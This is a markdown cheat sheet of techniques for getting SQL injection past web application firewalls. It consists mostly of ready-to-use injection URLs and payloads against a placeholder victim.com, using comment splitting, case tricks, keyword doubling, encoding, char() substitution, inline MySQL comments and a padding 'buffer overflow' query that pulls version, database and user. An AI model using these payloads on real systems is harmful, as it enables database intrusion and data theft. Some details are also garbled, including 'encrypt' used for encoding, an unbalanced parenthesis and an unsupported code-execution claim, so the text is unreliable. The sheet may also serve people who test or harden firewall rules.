<h1 align="center">WAF bypass Technique</h1>	

# Bypassing Methods and Techniques

#### 1. Pre-processor exploitation
- Make WAF skip input validation
#### 2. Impedance Mismatch
- WAF interpret input differently 
#### 3. Rule set Bypassing
- Use Payload that are not detected by WAF



# General step in WAF bypass

1. Fingerprint WAF and examine the filter rules
2. Encrypt the payload 
3. Test payload and examine the response 
4. If the payload cannot bypass WAF, use another payload and repeat from step 2






<h1 align="center">SQL injection WAF bypass</h1>


# Normal Bypassing Technique


## Bypass with Comment

- SQL comments allow to bypass a lot of filtering and WAF

`http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--`



## Case Changing

Some WAF filter only lowercase SQL keyword

Regex Filter ==> ` /union\sselect/g`

`http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--`



## Replaced Keyword

- Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass 

`http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--`

- Some case SQL keyword was filtered out and replaced with whitespace. So we can use `%0b` to
bypass.

`http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--`



## Adding or Removing White Space

- Adding or Removing space won't affect the SQL statement

- We can bypass WAF by adding or removing white space

#### Blocked Query
`' or 1 = 1'`

#### By pass statement
`'or '1'='1'`



## Character Encoding

- Many DBMS have different SQL syntax, most of them support Unicode, Base64, hex, octal, binary

- Many `blacklisted characters` can be replaced by their functional alternatives 


- Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only `decode the input once` so `double encoding` can bypass certain filters as the WAF will decode the input once then filter while application keep decoding the SQL statement executing

#### Normal Query

`' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = "dvwa" -- -`

#### Bypass Query

``' UNION SELECT table_schema, table_name FROM information_Schema.tables where table_schema = char(100,118,119,97) -- -``

- we replaced the “dvwa” with char(100,118,119,97) which is the MySQL char() function
that uses ASCII codes inside and we use it to inject into MySQL without using double quotes that many times gets filtered by WAFs. Char() also works on almost all other databases but sometimes it can only hold one character at a time, like for example char(0x##)+char(0x##)+...So if the one way does not work for us, we have to try another.



## Keyword Replacing

- Many times keywords themselves are blocked from the WAF. An encode way to bypass this filter is by replacing the keywords we use with others, so once the WAF strips the keyword, our desired keyword will remain

`' union selselectect password from mySQL.user limit 1 /*`

- WAF is blocking the select keyword.
- Once the query passes and gets filtered, the middle select keyword
- `sel` from the start and `ect` from the end will get merged and form a new select keyword that will get executed in the server.

## string Concatenation

- Break up SQL keyword and bypass WAF filter rules
- Concatenation syntax varies based on the database.

`EXEC ('SEL' + 'ECT 1'`



## Buffer Overflow

-WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of
data. Give a large amount of data allows our code executing

```
http://victim.com/news.php?id=1+and+(select 1)=(select
0x414141414141441414141414114141414141414141414141414141414141414141+union+select+1,2,version(),database(),user(),6,7,8,9,10--

```

## Inline Comments (MySQL Only)


-  MySQL Server supports some variants of C-style comments.
These enable you to write code that includes MySQL extensions, but is still portable, by using
comments of the following form: 

`/*! MySQL-specific code */`

- A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline
comments.

`http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--`

- Inline comments can be used throughout the SQL statement so if table_name or information_schema
are filtered we can add more inline comments

`http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)
+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--`


